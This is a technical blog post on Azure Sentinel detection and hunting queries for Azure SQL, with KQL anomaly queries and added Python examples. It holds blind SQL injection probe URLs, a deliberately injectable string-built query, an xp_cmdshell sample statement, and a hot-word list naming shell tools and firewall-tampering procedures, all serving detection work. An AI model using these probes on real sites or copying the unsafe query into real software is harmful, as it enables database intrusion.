<P>&nbsp;</P> Mon, 09 Aug 2021 18:35:01 GMT 
https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-fusion-detection-for-ransomware/ba-p/2621373 Sylvie_Liu 2021-08-09T18:35:01Z Azure Sentinel SQL Solution Query Deep-Dive https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-sql-solution-query-deep-dive/ba-p/2597961 <P><EM>by <LI-USER uid="686380"></LI-USER>&nbsp;&amp; Andrey Karpovsky<BR />Thanks to: Tamer Salman, Moshe Israel,&nbsp;Hani Neuvirth-Telem &amp; Yoav Daniely</EM></P> <P>&nbsp;</P> <P>In May 2021 <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-solutions/ba-p/2347312" target="_blank" rel="noopener">Azure Sentinel saw the launch</A> of <A href="#" target="_blank" rel="noopener">Azure Sentinel Solutions</A> into public preview. This launch provided Azure Sentinel preview customers with access to over 32 solutions spanning Microsoft and other vendor data sources.</P> <P>&nbsp;</P> <P>As part of this release Azure Defender and Microsoft Threat Intelligence Center (MSTIC) collaborated to contribute Detections and Hunting queries to the Azure Sentinel for Azure SQL solution. These detection and hunting queries are based on real world attack scenarios and provide a basis for detecting and investigating potential SQL exploitation attacks.</P> <P>&nbsp;</P> <P>In this tech community post we will cover each of the Detection and Hunting queries included in the Azure Sentinel SQL solution. 
This post will cover what malicious activity these queries are designed to uncover, how to tailor them for your environment using their configurable parameters, and provide some insight into how each query works.</P> <P>&nbsp;</P> <P>Whilst the detection and hunting queries discussed in this Tech Community post focus on Azure SQL, many of the techniques can be adapted to work with any relational database management system (RDBMS).</P> <P>&nbsp;</P> <P>More information on where to find Solutions within Azure Sentinel can <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-solutions/ba-p/2347312" target="_blank" rel="noopener">be found here</A>. Within the solutions tab search for “Azure Sentinel for Azure SQL” to install the SQL solution.</P> <P>&nbsp;</P> <H2>Common SQL Anomalies Indicating Compromise</H2> <P>For those unfamiliar with potentially malicious SQL activity, this section will briefly cover the different types of unusual activity that the detection and hunting queries are designed to detect. If you are already familiar with malicious SQL activity you may wish to skip straight to the queries.</P> <P>&nbsp;</P> <H3>Unsecured Databases</H3> <P>Databases that are improperly secured and exposed to the open internet will almost certainly see exploitation attempts. The MSTIC sensor network is a collection of deception services&nbsp;that collect data on active internet exploitation. In 2020 the MSTIC sensor network observed over 300,000 SQL code execution attempts targeted at our honeypot network. These were attempts where an SQL query was sent to the server with the intent of executing an unauthorised command.</P> <P>&nbsp;</P> <P>Unpatched vulnerable server software, weak passwords, and exposed administrative interfaces are all common vectors for attackers conducting mass scanning and exploitation operations.</P> <P>&nbsp;</P> <P>Azure hosted SQL servers benefit from some default protections. 
New SQL servers are firewalled from the open internet until firewall rules are added, and the firewall settings in Azure let you restrict a server to connections from specific IP addresses or ranges. Review whether the “Allow Azure services and resources to access this server” setting is really needed, since it admits connections from any Azure IP range, not only your own resources.</P> <P>&nbsp;</P> <H3>SQL Injection</H3> <P>SQL injection (SQLi) is a code injection technique in which an attacker sends crafted input that the application builds into an SQL statement; the input is crafted to exploit poorly implemented program logic. If successful, the commands sent by the attacker may allow data to be extracted from the database, existing records to be modified or new records created.</P> <P>&nbsp;</P> <P>SQL injection vulnerabilities are introduced when user-controllable input is improperly sanitised, or input sanitisation is circumvented by the attacker. SQL injection vulnerabilities may be found in any application that interacts with an SQL server; most commonly these are web applications.</P> <P>&nbsp;</P> <P>As the vulnerable application processes and executes the command on behalf of the attacker, any commands injected successfully into a web application are executed from the IP address where the vulnerable application is hosted. Successful SQLi therefore bypasses IP restrictions enforced with firewalls, and the client IP recorded in the SQL audit log (client_ip_s in the normalisation below) is the application server rather than the attacker, which makes attacks harder to investigate.</P> <P>&nbsp;</P> <P>&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="sql_attacker.jpg" style="width: 623px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299871i59E82DE9FE15FAC5/image-dimensions/623x169?v=v2" width="623" height="169" role="button" title="sql_attacker.jpg" alt="Threat actor injects SQL code into a vulnerable page, providing access to the underlying SQL database." 
/><span class="lia-inline-image-caption" onclick="event.preventDefault();">Threat actor injects SQL code into a vulnerable page, providing access to the underlying SQL database.</span></span></P> <P>&nbsp;</P> <P>SQLi can be performed with or without the application revealing the results of the injected query. When the page returns neither the query output nor database error messages, so that the attacker has to infer the outcome from indirect signals, the injection is referred to as being “blind”. Blind techniques are used both to determine whether a parameter is injectable and to extract data one true/false answer at a time; the two most common are Boolean based and time based blind SQL injection.</P> <P>&nbsp;</P> <H4>Boolean based Blind SQLi</H4> <P>Boolean based blind SQLi is a reconnaissance technique which uses Boolean statements, returning a True or False result, to determine if the code is being executed by the SQL server after injection into a vulnerable parameter. The attacker will view the page using standard parameters and then inject code to force a true or false result. They will then look for differences in the returned result to determine if their injection was successful.</P> <P>&nbsp;</P> <P>In the below example, the attacker injects some SQL into the “id” parameter of the members page, in the first instance appending an AND condition that evaluates to false:</P> <P>&nbsp;</P> <LI-CODE lang="markup">http://contoso.com/member.php?id=1 and 1=2</LI-CODE> <P>&nbsp;</P> <P>This will cause the page to believe that the requested member ID doesn’t exist. While the member with an ID of 1 exists, the second part of the statement is false, so the whole WHERE clause evaluates to false. The attacker will then inject SQL that returns true:</P> <P>&nbsp;</P> <LI-CODE lang="markup">http://contoso.com/member.php?id=1 and 1=1</LI-CODE> <P>&nbsp;</P> <P>By looking for differences in the response the attacker can determine the page is vulnerable. In the example above, when the first request is sent the page returns an error stating the member was not found. 
In the second request the attacker forces a true result, and therefore the page returns a successful lookup. If the attacker’s injection were not working, or the injected SQL was being filtered out, the page would behave normally, returning member information for member ID 1 in both instances.</P> <P>&nbsp;</P> <H4>Time-based blind SQLi</H4> <P>Time based blind SQL injection uses SQL sleep functions to force the query to wait for a pre-determined amount of time. Like Boolean blind SQL injection, it relies on the attacker first baselining the vulnerable page’s behaviour and then injecting crafted requests to force unusual execution times.</P> <P>&nbsp;</P> <P>An attacker may visit the page with normal parameters, and note that the baseline request completes in 88 milliseconds.</P> <P>&nbsp;</P> <LI-CODE lang="markup">http://contoso.com/member.php?id=1</LI-CODE> <P>&nbsp;</P> <P>The attacker may then append the SQL Server WAITFOR DELAY command as a second, stacked statement, forcing the query to wait for 5 seconds if executed (other engines expose the same primitive under other names, such as SLEEP() in MySQL or pg_sleep() in PostgreSQL).</P> <P>&nbsp;</P> <LI-CODE lang="markup">http://contoso.com/member.php?id=1; WAITFOR DELAY '00:00:05'</LI-CODE> <P>&nbsp;</P> <P>The attacker will know the injection is successful if the page which previously took 88 milliseconds now takes over 5 seconds to respond.</P> <P>&nbsp;</P> <P>This technique can be detected by analysing logs or web requests for the presence of WAITFOR commands; however, there are many techniques to obfuscate the injected command, allowing the attacker to bypass static keyword detection.</P> <P>&nbsp;</P> <H3>Data Extraction &amp; Manipulation</H3> <P>The end goal for most attackers targeting SQL servers is to extract data or to delete or damage it. SQL databases often contain sensitive information that is attractive to both criminal and nation-state actors. Extraction of sensitive user information may provide a nation-state threat group with information to further exploit the network, or may be of intelligence value alone. 
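</P> <P>The Boolean probe described above, reproduced as an added Python example that is not part of this post or of the Azure Sentinel SQL solution: an in-memory SQLite table of constructed member rows stands in for the member.php page, a string-built lookup plays the vulnerable page and a parameterised lookup plays its fix, and the probe sends the baseline, “and 1=2” and “and 1=1” requests and checks whether the responses differ in the way the text describes. The table name and member rows are assumptions.</P>

```python
"""Boolean blind SQLi oracle: a string-built lookup beside its parameterised fix.

Added example, not code from the post or the Azure Sentinel SQL solution. It stands
in for the member.php?id= page described above using an in-memory SQLite database
with constructed rows; the table name 'members' is an assumption.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Throwaway database with a few constructed member rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """The 'before' pattern: the request parameter is pasted into the SQL text, so
    'id=1 and 1=2' becomes part of the WHERE clause and changes the result."""
    sql = f"SELECT name FROM members WHERE id = {raw_id}"  # deliberately unsafe
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_parameterised(conn: sqlite3.Connection, raw_id: str):
    """The hardened pattern: the parameter is bound as a value. '1 and 1=1' is
    compared as a literal against the id column and never parsed as SQL, so it
    matches nothing; a plain '1' still matches member 1."""
    row = conn.execute("SELECT name FROM members WHERE id = ?", (raw_id,)).fetchone()
    return row[0] if row else None


def is_boolean_oracle(lookup, conn: sqlite3.Connection, base_id: str = "1") -> bool:
    """Replay the attacker's probe from the post: baseline request, then the same id
    with 'and 1=2' (should fail if injectable) and 'and 1=1' (should match again).
    Returns True when the responses differ exactly the way a vulnerable page's do,
    i.e. the injected condition is being evaluated by the database."""
    baseline = lookup(conn, base_id)
    false_probe = lookup(conn, f"{base_id} and 1=2")
    true_probe = lookup(conn, f"{base_id} and 1=1")
    return baseline is not None and false_probe is None and true_probe == baseline


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("parameterised", lookup_parameterised)):
        print(f"{name:14s} injectable={is_boolean_oracle(fn, db)}")
```

<P>The point the two lookups make for a defender: the parameterised version does not “sanitise” the input, it never lets the input reach the SQL grammar, so the same probe yields no oracle. A time-based probe cannot be shown the same way because SQLite has no sleep primitive.</P> <P>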
Organised crime groups may seek to sell the data onwards, or encrypt or destroy it as part of a ransomware campaign.</P> <P>&nbsp;</P> <H2>Detection Queries</H2> <P>This section covers the detection queries in detail. These queries are designed to be used as alerts on potentially malicious attempts to access and exploit the resources. Detection queries expose several parameters that can be easily tuned to control the accuracy and quantity of detections. Detections look for suspicious events inside a recent detection window that are anomalous when compared with the behaviour learned in the preceding training window. In addition, these queries can be used as templates for other security scenarios.</P> <P>&nbsp;</P> <P>Each detection query is built on top of a standard normalisation, using the following Kusto query to process SQL log data. For brevity, each individual query will not include this normalisation step. Complete queries can be found within the Azure Sentinel SQL solution. The detectionWindow, trainingWindow and timeSliceSize parameters referenced by the WindowType and timeSlice columns are declared by each detection query; they are declared here with the defaults from the parameter lists below so that the block runs on its own.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">// Parameters that each detection query declares (defaults from the parameter lists below)
let detectionWindow = 1h;
let trainingWindow = detectionWindow + 14d;
let timeSliceSize = 1h;
// Read far enough back to cover the whole training window
let timeRange = trainingWindow;
let processedData = materialize (
    AzureDiagnostics
    | where TimeGenerated &gt; ago(timeRange)
    | where Category == 'SQLSecurityAuditEvents' and action_id_s has_any ("RCM", "BCM") // Keep only SQL affected rows
    | project TimeGenerated, PrincipalName = server_principal_name_s
        , ClientIp = client_ip_s, HostName = host_name_s, ResourceId
        , ApplicationName = application_name_s, ActionName = action_name_s
        , Database = strcat(LogicalServerName_s, '/', database_name_s)
        , IsSuccess = succeeded_s, DurationMs = duration_milliseconds_d
        , AffectedRows = affected_rows_d, ResponseRows = response_rows_d
        , Statement = statement_s
        // Error number: from &lt;error_code&gt; for failed statements, or from &lt;failure_reason&gt; for failed logins
        , Error = case(
            additional_information_s has 'error_code', toint(extract("&lt;error_code&gt;([0-9.]+)", 1, additional_information_s))
            , additional_information_s has 'failure_reason', toint(extract("&lt;failure_reason&gt;Err ([0-9.]+)", 1, additional_information_s))
            , 0)
        , State = case(
            additional_information_s has 'error_state', toint(extract("&lt;error_state&gt;([0-9.]+)", 1, additional_information_s))
            , additional_information_s has 'failure_reason', toint(extract("&lt;failure_reason&gt;Err ([0-9.]+), Level ([0-9.]+)", 2, additional_information_s))
            , 0)
        , AdditionalInfo = additional_information_s
        , timeSlice = floor(TimeGenerated, timeSliceSize)
    // row_number() needs serialized input; label each row by the window it falls in
    | serialize
    | extend RowNumber = row_number(), WindowType = case(
        TimeGenerated &gt;= ago(detectionWindow), 'detection',
        (ago(trainingWindow) &lt;= TimeGenerated and TimeGenerated &lt; ago(detectionWindow)), 'training',
        'other')
);</LI-CODE> <P>&nbsp;</P> <P>Detection queries can be divided into 3 broad categories by similar logic and content.</P> <P>&nbsp;</P> <H3>Detections for volumetric spikes</H3> <P>These detections monitor a single numeric variable and look for significant upward spikes that are anomalous when compared to the normal behaviour of the same variable on that resource in the training period. For example, if a malicious actor attempts to extract all the records in a database, the spike in returned rows is detected.</P> <P>&nbsp;</P> <P>Currently 2 detections of this type are included, looking at different numeric columns (and security scenarios):</P> <OL> <LI><STRONG>VolumeAffectedRowsStatefulAnomalyOnDatabase</STRONG>: Monitors the ‘AffectedRows’ metric, which reflects changes made in the database. Upward spikes indicate that an unusually large number of rows were changed, which might indicate attempts to destroy data or make it temporarily unusable.</LI> <LI><STRONG>VolumeResponseRowsStatefulAnomalyOnDatabase</STRONG>: Monitors the ’ResponseRows’ metric, which reflects the number of rows returned to the client and therefore potential exfiltration from the database. 
Spikes indicate that too many data rows were extracted, which might indicate potential data theft.</LI> </OL> <P>&nbsp;</P> <P>The queries share several parameters that control the query logic and are exposed for easy control.</P> <UL> <LI><STRONG>monitoredColumn (values: ‘ResponseRows’, ‘AffectedRows’):</STRONG> Name of the volumetric variable column that is analyzed in the query.</LI> <LI><STRONG>volumeThresholdZ (default value: 3.0):</STRONG> Minimal threshold for the relative anomaly score (zScore), which is the number of standard deviations by which the value exceeds the training average. Higher values mean alerts are triggered only by very significant anomalies. For example, with a training average of 100 rows and a standard deviation of 200, values of 1500 and 900 have zScores of roughly 7.0 and 4.0: both trigger alerts when volumeThresholdZ = 3.0, but only 1500 does when volumeThresholdZ = 5.0.</LI> <LI><STRONG>volumeThresholdQ (default value: volumeThresholdZ):</STRONG> Minimal threshold for the absolute anomaly score (qScore), which measures how far the value lies above the 99<SUP>th</SUP> percentile of the training data, in units of the distance between the median and the 99<SUP>th</SUP> percentile. Higher values mean alerts are triggered only by very significant anomalies.</LI> <LI><STRONG>volumeThresholdHardcoded (default value: 500):</STRONG> Minimal threshold for the actual value of the monitored column. With the default, only values above 500 rows can trigger alerts (provided the other thresholds are passed as well); this stops statistically unusual but small values alerting on quiet databases.</LI> <LI><STRONG>detectionWindow (default value: 1h):</STRONG> Size of the recent time window (back from the current time). Events in this window are analyzed for anomalies, and anomalies that are significant (based on the thresholds) appear in the output.</LI> <LI><STRONG>trainingWindow (default value: detectionWindow + 14d):</STRONG> Size of the window preceding the detection window that is used to calculate the metrics for normal behaviour. 
Events in the detection window are compared with these metrics.</LI> </UL> <P>The standardized data is split into two datasets. The training window is a relatively long period (14 to 30 days are recommended) which precedes the detection window and is used to learn the normal and expected behaviour on the resource. Basic measures of central tendency (average and median) and dispersion (standard deviation and inter-percentile range) are calculated to model this behaviour.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">// Training set: one row of baseline statistics per database.
// QuantityColumn stands for the column selected by the monitoredColumn parameter (ResponseRows or AffectedRows).
let trainingSet = processedData
    | where WindowType == 'training'
    | summarize AvgVal = round(avg(QuantityColumn), 2)
        , StdVal = round(stdev(QuantityColumn), 2)
        , N = count() // number of training rows for the database; gates the scores below
        , P99Val = round(percentile(QuantityColumn, 99), 2)
        , P50Val = round(percentile(QuantityColumn, 50), 2)
        by Database;</LI-CODE> <P>&nbsp;</P> <P>The detection window is a relatively short period (1 to 24 hours are advised) and is used to monitor recent values of the metric. If a recent value is significantly higher than the chosen thresholds, an alert is triggered. 
By lowering the thresholds, the user can allow more (less significant) alerts to be raised.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">// Thresholds (defaults from the parameter list above)
let volumeThresholdZ = 3.0;
let volumeThresholdQ = volumeThresholdZ;
let volumeThresholdHardcoded = 500;
processedData
| where WindowType == 'detection'
| join kind = inner (trainingSet) on Database
// zScore: standard deviations above the mean; qScore: (P99 - P50) ranges above the 99th percentile.
// Both are zeroed when fewer than 20 training rows exist, so sparse databases do not alert.
| extend ZScoreVal = iff(N &gt;= 20, round(todouble(QuantityColumn - AvgVal) / todouble(StdVal + 1), 2), 0.00)
    , QScoreVal = iff(N &gt;= 20, round(todouble(QuantityColumn - P99Val) / todouble(P99Val - P50Val + 1), 2), 0.00)
| extend IsVolumeAnomalyOnVal = iff((ZScoreVal &gt; volumeThresholdZ and QScoreVal &gt; volumeThresholdQ and QuantityColumn &gt; volumeThresholdHardcoded), true, false)
    , AnomalyScore = round((ZScoreVal + QScoreVal) / 2, 0)
| project TimeGenerated, Database, PrincipalName, ClientIp, HostName, ApplicationName, ActionName, Statement, IsSuccess, ResponseRows, AffectedRows, IsVolumeAnomalyOnVal, AnomalyScore
| where IsVolumeAnomalyOnVal == true
| sort by AnomalyScore desc, TimeGenerated desc</LI-CODE> <P>&nbsp;</P> <P>The output of the query is the list of events in the detection window that were flagged as anomalous (IsVolumeAnomalyOnVal = true) with the defined parameters, together with the AnomalyScore field. The higher the AnomalyScore, the more anomalous the event.</P> <P>&nbsp;</P> <H3>Detections for Monitored Errors</H3> <P>These detections look for statements or login attempts that fail with specific errors, which might indicate malicious attempts to access or exploit the database. For example, login failures caused by firewall blocks or incorrect credentials might indicate a malicious attempt to gain access to the database. In some environments, specific errors are expected. 
&nbsp;To prevent noise in these cases, minimal thresholds for the number of events that trigger the alerts are exposed and can be adapted to raise an alert on any relevant event, or only when a specific count is reached.</P> <P>Currently, 3 detections of this type are included, looking for different errors (and security scenarios):</P> <P>&nbsp;</P> <OL> <LI><STRONG>ErrorsFirewallStatefulAnomalyOnDatabase:</STRONG> Looks for login attempts that are blocked by existing firewall rules (error 40615). Such events might indicate that an unauthorized actor unsuccessfully tried to gain access to the database. This alert is useful because it can help prevent further attacks on the same target (e.g. coming from a different source).</LI> <LI><STRONG>ErrorsCredentialStatefulAnomalyOnDatabase</STRONG>: Looks for login attempts that failed due to incorrect credentials (error 18456). Such events might indicate that an unauthorized actor tried to gain access to the database but didn’t have the correct credential combination. The attempts might continue with different credential sets (brute force).</LI> <LI><STRONG>ErrorsSyntaxStatefulAnomalyOnDatabase:</STRONG> Looks for attempts to execute queries that failed on syntax mistakes (errors 102 and 105). The attacker may be unfamiliar with the structure and content of the resource; in such a case the malicious queries may be malformed (e.g. in the case of SQLi) or contain unsupported scripting attempts, and will fail on syntax errors.</LI> </OL> <P>&nbsp;</P> <P>The queries share the following parameters:</P> <UL> <LI><STRONG>detectionWindow (default value: 1h):</STRONG> size of the recent time window (as described above).</LI> <LI><STRONG>trainingWindow (default value: detectionWindow + 14d):</STRONG> training window size before the detection window (as described above).</LI> <LI><STRONG>timeSliceSize (default value: 1h):</STRONG> size of the slices into which the data is divided. 
The number of suspicious failed attempts is calculated per slice.</LI> <LI><STRONG>monitoredStatementsThreshold (default value: 1):</STRONG> the minimal number of monitored failed attempts per slice for the slice to be flagged as suspicious. For example, if some credential failures are expected due to human error, this can be set to 10; an alert is then only possible when 10 or more failures are seen in a slice.</LI> <LI><STRONG>trainingSlicesThreshold (default value: 5):</STRONG> the maximal number of flagged slices (based on the previous parameters) in the training window. If more training slices than this were flagged, the behaviour is considered normal for the resource and no alert is triggered for a similar event in the current slice. If the number is set high (e.g. 1000), every detection slice with monitored attempts triggers an alert. If the number is set to 0, an alert is triggered only when no training slice contained the monitored error.</LI> <LI><STRONG>monitoredErrors (values: (40615) firewall block failures, (18456) credential failure errors, (102, 105) syntax errors):</STRONG> SQL error codes that are monitored for the scenario.</LI> </UL> <P>&nbsp;</P> <P>This detection looks for logins or queries that fail with the monitored error codes. Within the training window, each time slice (e.g. an hour, as set by timeSliceSize) that contains at least monitoredStatementsThreshold monitored errors is flagged. 
For example, with monitoredStatementsThreshold set to 5, every slice with five or more monitored errors is flagged.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">// Parameters (defaults from the list above); monitoredErrors holds the codes for the chosen scenario
let monitoredErrors = dynamic([18456]); // 40615 firewall blocks, 18456 credential failures, 102 and 105 syntax errors
let monitoredStatementsThreshold = 1;
let trainingSlicesThreshold = 5;
// Count monitored errors per database and time slice. The full solution query performs this
// per-slice aggregation before the steps below; it is shown here so the fragment is self-contained.
let slicedData = processedData
    | where Error in (monitoredErrors)
    | summarize countStatementsWithError = count(), arg_max(TimeGenerated, *) by Database, timeSlice, WindowType;
// Training: how many slices per database already reached the threshold
let trainingSet = slicedData
    | where WindowType == 'training'
    | summarize countSlicesWithErrors = dcountif(timeSlice, countStatementsWithError &gt;= monitoredStatementsThreshold) by Database;
// Detection: alert on a slice that reaches the threshold, unless the behaviour was already common in training
slicedData
| where WindowType == 'detection'
| join kind = inner (trainingSet) on Database
| extend IsErrorAnomalyOnStatement = iff(((countStatementsWithError &gt;= monitoredStatementsThreshold) and (countSlicesWithErrors &lt;= trainingSlicesThreshold)), true, false)
    , anomalyScore = round(countStatementsWithError / monitoredStatementsThreshold, 0)
| where IsErrorAnomalyOnStatement == true
| sort by anomalyScore desc, timeSlice desc</LI-CODE> <P>&nbsp;</P> <P>The alert is triggered if the detection window contains a slice that reaches the threshold for the monitored error code, whilst the number of flagged slices within the training window is at or below the threshold (trainingSlicesThreshold parameter). The latter condition helps control the number of alerts, especially in environments where such behaviour is expected and common.</P> <P>The output of the query contains the detection-window slices that were flagged as anomalous, together with the anomalyScore (the number of monitored errors in the slice divided by monitoredStatementsThreshold); higher values are more anomalous.</P> <P>&nbsp;</P> <H3>Detections for Monitored "Hot Words"</H3> <P>These detections look for statements that include hot words that might indicate attempts to execute malicious code. For example, shell commands (e.g. using the ‘xp_cmdshell’ procedure) can be used to run malicious scripts. 
These attempts might be successful or blocked, depending on the SQL version and settings (xp_cmdshell, for example, is disabled by default on SQL Server and is not available in Azure SQL Database), but a failed attempt is still a strong signal of an attacker probing the server.</P> <P>&nbsp;</P> <P>Currently, 5 detections of this type are included, covering different scenarios:</P> <P>&nbsp;</P> <OL> <LI><STRONG>HotwordsDropStatefulAnomalyOnDatabase:</STRONG> Looks for statements that drop resources (tables or databases). This might indicate that a malicious actor is attempting to delete valuable data and disrupt business activity.</LI> <LI><STRONG>HotwordsExecutionStatefulAnomalyOnDatabase:</STRONG> Looks for attempts to run shell commands or scripts via SQL. This could indicate an attempt to download malware or run malicious processes (e.g. coin mining). Even if shell execution is disabled, it might indicate that a malicious agent has gained access to the SQL server and is making blind attempts.</LI> <LI><STRONG>HotwordsFirewallRuleStatefulAnomalyOnDatabase: </STRONG>Looks for attempts to change or delete firewall rules. Since tight firewall rules hinder potential attacks, a malicious user might change them to pave the way for persistent access in the future.</LI> <LI><STRONG>HotwordsOLEObjectStatefulAnomalyOnDatabase:</STRONG> Looks for attempts to create or use OLE Automation objects (sp_OACreate and related procedures), which can be used as part of a persistent attack scenario.</LI> <LI><STRONG>HotwordsOutgoingStatefulAnomalyOnDatabase:</STRONG> Looks for attempts to access external websites or resources. 
These might be used in attack scenarios to download malware or contact command and control servers during the attack.</LI> </OL> <P>The queries share the following parameters:</P> <P>&nbsp;</P> <UL> <LI><STRONG>detectionWindow (default value: 1h):</STRONG> size of the recent time window (as described above).</LI> <LI><STRONG>trainingWindow (default value: detectionWindow + 14d):</STRONG> training window size before the detection window (as described above).</LI> <LI><STRONG>timeSliceSize (default value: 1h):</STRONG> size of the slices into which the data is divided (as described above).</LI> <LI><STRONG>monitoredStatementsThreshold (default value: 1):</STRONG> the minimal number of statements with monitored hot words per slice for the slice to be flagged as suspicious (as described above).</LI> <LI><STRONG>trainingSlicesThreshold (default value: 5):</STRONG> the maximal number of flagged slices in the training window (as described above).</LI> <LI><STRONG>Hot words:</STRONG> <UL> <LI><STRONG>('drop table', 'drop database’):</STRONG> Dropping tables or databases</LI> <LI><STRONG>('xp_cmdshell', 'ps.exe', 'powershell', 'cmd.exe', 'msiexec', '&lt;script&gt;’):</STRONG> Shell command executions</LI> <LI><STRONG>('http:', 'https:', 'ftp:', 'onion.pet’):</STRONG> Outgoing connections to external websites</LI> <LI><STRONG>('sp_set_firewall_rule', 'sp_set_database_firewall_rule', 'sp_delete_database_firewall_rule', 'sp_delete_firewall_rule', 'sys.firewall_rules', 'sys.database_firewall_rules’):</STRONG> Firewall rule tampering</LI> <LI><STRONG>('sp_oamethod', 'sp_oacreate', 'sp_oasetproperty’): </STRONG>OLE object manipulation</LI> </UL> </LI> </UL> <P>&nbsp;</P> <P>The detection logic is similar to the monitored errors detection. Time slices containing monitored hot words in the training window are flagged. 
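</P> <P>The three detection families above share one stateful pattern: statistics or counts learned in the training window decide whether a detection-window event is worth an alert. The following Python, an added example that is not part of this post or of the Azure Sentinel SQL solution, replays that logic over constructed audit events (14 days of hourly reads on a made-up “srv/db1” database, a few training-period credential failures, and a detection hour holding a 5000-row read, a 300-row read, four login failures and an xp_cmdshell attempt) so that the effect of volumeThresholdHardcoded, monitoredStatementsThreshold and trainingSlicesThreshold can be tried offline. Field names follow the normalised columns; the sample data, the principal names and the NOW timestamp are constructed.</P>

```python
"""Stateful SQL audit detections replayed over constructed sample events.

Added example, not code from the Azure Sentinel SQL solution. It mirrors the three
detection families in the post (volumetric spikes, monitored errors, hot words) with
the defaults from the parameter lists. Field names follow the post's normalised
columns; the events, the 'srv/db1' database, the principals and NOW are constructed.
"""
import math
import statistics
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

DETECTION_WINDOW = timedelta(hours=1)                    # detectionWindow default
TRAINING_WINDOW = DETECTION_WINDOW + timedelta(days=14)  # trainingWindow default
NOW = datetime(2021, 8, 1, 12, 0, tzinfo=timezone.utc)   # constructed "current time"


def window_type(t, now):
    """Same split as the WindowType column: detection, training or other."""
    if t >= now - DETECTION_WINDOW:
        return "detection"
    return "training" if now - TRAINING_WINDOW <= t < now - DETECTION_WINDOW else "other"


def time_slice(t):
    """floor(TimeGenerated, timeSliceSize) with the 1h default."""
    return t.replace(minute=0, second=0, microsecond=0)


def percentile(values, p):
    """Nearest-rank percentile (exact; KQL's percentile() is an estimate)."""
    s = sorted(values)
    return s[max(0, math.ceil(p / 100 * len(s)) - 1)]


def volumetric_anomalies(events, now, column, z_thr=3.0, q_thr=None, hard_thr=500):
    """Volume*StatefulAnomalyOnDatabase: zScore against the training mean and standard
    deviation, qScore against the P50..P99 range, plus a hard floor on the raw value.
    Databases with fewer than 20 training rows never score; events without the
    column (e.g. failed logins) are ignored."""
    q_thr = z_thr if q_thr is None else q_thr
    train = defaultdict(list)
    for e in events:
        if e.get(column) is not None and window_type(e["time"], now) == "training":
            train[e["database"]].append(e[column])
    alerts = []
    for e in events:
        x, vals = e.get(column), train.get(e["database"], [])
        if x is None or len(vals) < 20 or window_type(e["time"], now) != "detection":
            continue
        avg, std = statistics.mean(vals), statistics.stdev(vals)
        p99, p50 = percentile(vals, 99), percentile(vals, 50)
        z = (x - avg) / (std + 1)
        q = (x - p99) / (p99 - p50 + 1)
        if z > z_thr and q > q_thr and x > hard_thr:
            alerts.append({**e, "zScore": round(z, 2), "qScore": round(q, 2),
                           "AnomalyScore": round((z + q) / 2)})
    return sorted(alerts, key=lambda a: -a["AnomalyScore"])


def slice_anomalies(events, now, monitored, stmt_thr=1, training_slices_thr=5):
    """Errors*/Hotwords*StatefulAnomalyOnDatabase: count monitored events per
    (database, slice). A detection slice alerts when it reaches stmt_thr and at most
    training_slices_thr training slices of that database did the same, so behaviour
    that is already common on the resource is suppressed."""
    per_slice = Counter()
    for e in events:
        w = window_type(e["time"], now)
        if w != "other" and monitored(e):
            per_slice[(e["database"], time_slice(e["time"]), w)] += 1
    flagged_training = Counter(db for (db, _, w), c in per_slice.items()
                               if w == "training" and c >= stmt_thr)
    return [{"database": db, "timeSlice": sl, "count": c, "anomalyScore": round(c / stmt_thr)}
            for (db, sl, w), c in per_slice.items()
            if w == "detection" and c >= stmt_thr and flagged_training[db] <= training_slices_thr]


def error_in(codes):
    """monitoredErrors predicate, e.g. error_in({40615}) or error_in({18456})."""
    return lambda e: e.get("error", 0) in codes


def hot_words(words):
    """Hot word predicate; the post's word lists (xp_cmdshell, drop table, ...) plug in here."""
    return lambda e: any(w in e["statement"].lower() for w in words)


def sample_events(now=NOW):
    """Constructed audit events: 14 days of hourly reads returning 50..110 rows, two small
    clusters of credential failures (18456) in training, and a detection hour holding a
    5000-row read, a 300-row read, an xp_cmdshell attempt and four more failures."""
    db = "srv/db1"
    ev = [dict(time=now - DETECTION_WINDOW - timedelta(hours=h + 1), database=db, principal="app_user",
               statement="SELECT * FROM orders WHERE customer_id = 42", error=0,
               response_rows=50 + (h % 7) * 10) for h in range(24 * 14)]
    for base, n in ((now - timedelta(days=3, hours=2), 3), (now - timedelta(days=9, hours=5), 2)):
        ev += [dict(time=base + timedelta(minutes=k), database=db, principal="app_user",
                    statement="", error=18456, response_rows=None) for k in range(n)]
    det = now - timedelta(minutes=30)
    ev += [dict(time=det, database=db, principal="app_user", error=0, statement=s, response_rows=r)
           for s, r in (("SELECT * FROM orders", 5000),
                        ("SELECT * FROM orders WHERE region = 'EU'", 300),
                        ("EXEC xp_cmdshell 'whoami'", 0))]
    ev += [dict(time=det + timedelta(minutes=k), database=db, principal="sa",
                statement="", error=18456, response_rows=None) for k in range(4)]
    return ev


if __name__ == "__main__":
    ev = sample_events()
    for a in volumetric_anomalies(ev, NOW, "response_rows"):
        print("volume:", a["response_rows"], "rows, AnomalyScore", a["AnomalyScore"])
    print("credential:", slice_anomalies(ev, NOW, error_in({18456})))
    print("hot words:", slice_anomalies(ev, NOW, hot_words(("xp_cmdshell", "powershell", "cmd.exe"))))
```

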